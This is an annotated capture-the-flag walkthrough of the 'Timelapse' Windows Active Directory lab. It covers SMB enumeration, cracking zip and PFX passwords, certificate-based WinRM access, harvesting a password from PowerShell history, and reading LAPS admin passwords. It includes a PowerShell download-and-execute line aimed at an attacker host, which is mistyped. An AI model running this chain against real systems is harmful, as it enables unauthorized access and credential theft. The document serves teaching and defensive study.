Timelapse
¡Hola, esta es la máquina Timelapse! Let’s hack!
RECON
# Reachability check: a single ICMP echo to the target.
ping -c 1 <IP>
# Full TCP port sweep: -p- every port, --open report only open ones, -sS SYN scan,
# -n no DNS lookups, -Pn skip host discovery, -oG greppable output into ./ports.
# NOTE: --min-rate 5000 is very noisy; a sweep like this stands out in IDS/firewall logs.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
# extractports is not a standard tool; presumably a local helper that turns the greppable
# file into a comma-separated port list — confirm it exists in the attacking shell.
extractports <ports>
# Service/version detection (-sV) plus default NSE scripts (-sC), restricted to the open ports.
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
# Unauthenticated SMB banner: hostname, AD domain name, OS build and SMB signing status.
crackmapexec smb <IP>
# Root is needed to edit /etc/hosts; a static entry lets the tooling resolve the
# domain name without depending on the target's DNS.
sudo su
nvim /etc/hosts
# Line appended to /etc/hosts (file content, not a command): target IP -> AD domain name.
<IP> <DOMAIN>
SMB ENUM
# Share listing as an anonymous (null) session: -L list shares, -N no password prompt.
smbclient -L <IP> -N
# Same share enumeration, with the read/write permission each share grants.
crackmapexec smb <IP> --shares
# Access check using a username that does not exist; anything readable here is exposed to
# guest/null access. Defender side: disable anonymous and guest share access on the host.
smbmap -H <IP> -u 'null'
SMB ENUM MACHINE
# Connect to the "Shares" share without credentials (-N).
smbclient //<IP>/Shares -N
# The next two lines run inside the smbclient prompt, not in bash:
# change into Dev and download the archive found there.
cd Dev
get <Archivo.zip>
CRACK ZIP FILE PASSWORD
# First extraction attempt; presumably prompts for a password, which motivates the cracking step.
unzip <Archivo.zip>
# Dictionary attack on the zip password: -D dictionary mode, -p wordlist path,
# -u verify each candidate with unzip (avoids false positives), -v verbose.
# Only succeeds because the password is present in rockyou.txt.
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt <Archivo.zip>
# Second extraction with the recovered password.
unzip <Archivo.zip>
TRYING TO OPEN PFX FILE
# Pull the private key out of the PKCS#12 bundle: -nocerts key only, -nodes write it
# unencrypted. This prompts for the bundle's import password, which is why the two
# cracking routes below are needed. Delete the unencrypted .pem once it is no longer used.
openssl pkcs12 -in <Archivo.pfx> -nocerts -out priv-key.pem -nodes
FINDING PFX FILE PASSWORD (PFX2JOHN)
# Convert the .pfx into a John-format hash for offline cracking
# (pfx2john.py ships in the run/ directory of John the Ripper jumbo).
python3 pfx2john.py <Archivo.pfx>
FINDING PFX FILE PASSWORD (CRACKPKCS12)
# Build dependency: crackpkcs12 links against OpenSSL.
apt install libssl-dev
# Build from source. NOTE: `make install` as root from a freshly cloned, unreviewed
# repository executes arbitrary build scripts with full privileges — pin a reviewed
# commit or inspect configure/Makefile before installing.
git clone https://github.com/crackpkcs12/crackpkcs12
cd crackpkcs12
./configure
make
make install
# Dictionary attack on the PKCS#12 password (-d wordlist); alternative to the john route above.
crackpkcs12 -d /usr/share/wordlists/rockyou.txt <Archivo.pfx>
OPENING PFX FILE
# Same key extraction as before, now with the recovered password: key only (-nocerts), unencrypted (-nodes).
openssl pkcs12 -in <Archivo.pfx> -nocerts -out priv-key.pem -nodes
ls
# Certificate only (-nokeys); together with priv-key.pem this is a complete client identity.
openssl pkcs12 -in <Archivo.pfx> -nokeys -out certificate.pem
# The Subject/SAN fields presumably show which AD user the certificate was issued to.
cat certificate.pem
ACCESS GRANTED: LEGACYY USER
# WinRM login using client-certificate authentication: -c certificate, -k private key,
# -S TLS (port 5986). Defender side: a leaked .pfx is a credential — revoke the
# certificate and rotate the key pair; do not leave .pfx files on shares.
evil-winrm -i <IP> -c certificate.pem -k priv-key.pem -S
# From here the commands run in the remote PowerShell session.
whoami
FLAG USER.TXT
# Remote session (starting directory not shown): go up one level, into Desktop, and read the user flag.
cd ..
cd Desktop
cat user.txt
AD ENUM LOCAL
# Local enumeration from the legacyy session: accounts, privileges of the current token,
# and details (group membership, flags) of the two users of interest.
net user
whoami /priv
net user legacyy
net user svc_deploy
# PSReadline keeps an on-disk history of every PowerShell line this user typed; presumably
# this is where the svc_deploy password used below was found. Defender side: never type
# credentials on the command line, and clear/disable history for accounts doing admin work.
type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ACCESS GRANTED: SVC_DEPLOY USER
# Validate the recovered credential over SMB before using it interactively.
crackmapexec smb <IP> -u 'svc_deploy' -p '<PASSWORD>'
# Log in as svc_deploy over WinRM/TLS (-S).
evil-winrm -i <IP> -u 'svc_deploy' -p '<PASSWORD>' -S
whoami
SERVING GET-LAPSPASSWORDS.PS1
# ATTACKING MACHINE
git clone https://github.com/kfosaaen/Get-LAPSPasswords
cd Get-LAPSPasswords
# Serve the script over plain HTTP on port 80 (unencrypted, visible on the wire).
python3 -m http.server 80
# VICTIM MACHINE (PowerShell session as svc_deploy)
# Download the script into memory and run it. NOTE: `New.Object` looks like a typo for the
# `New-Object` cmdlet; as written this line would fail. Defender side: an in-memory IEX of a
# remote script is exactly what PowerShell script block logging and AMSI are meant to surface.
IEX(New.Object Net.WebClient).downloadString('http://<IP_ATACANTE>/Get-LAPSPasswords.ps1')
# Reads the LAPS-managed local Administrator password from AD — presumably because svc_deploy
# has read rights on that attribute. Defender side: restrict LAPS password read rights to the
# minimum set of principals and audit who holds them.
Get-LAPSPasswords
ACCESS GRANTED: ADMINISTRATOR USER
# Validate the LAPS password over SMB, then log in as Administrator over WinRM/TLS (-S).
crackmapexec smb <IP> -u 'Administrator' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'Administrator' -p '<PASSWORD>' -S
whoami
FLAG ROOT.TXT
# Root flag sits under the TRX profile rather than Administrator's — path as found on the box.
type C:\users\TRX\Desktop\root.txt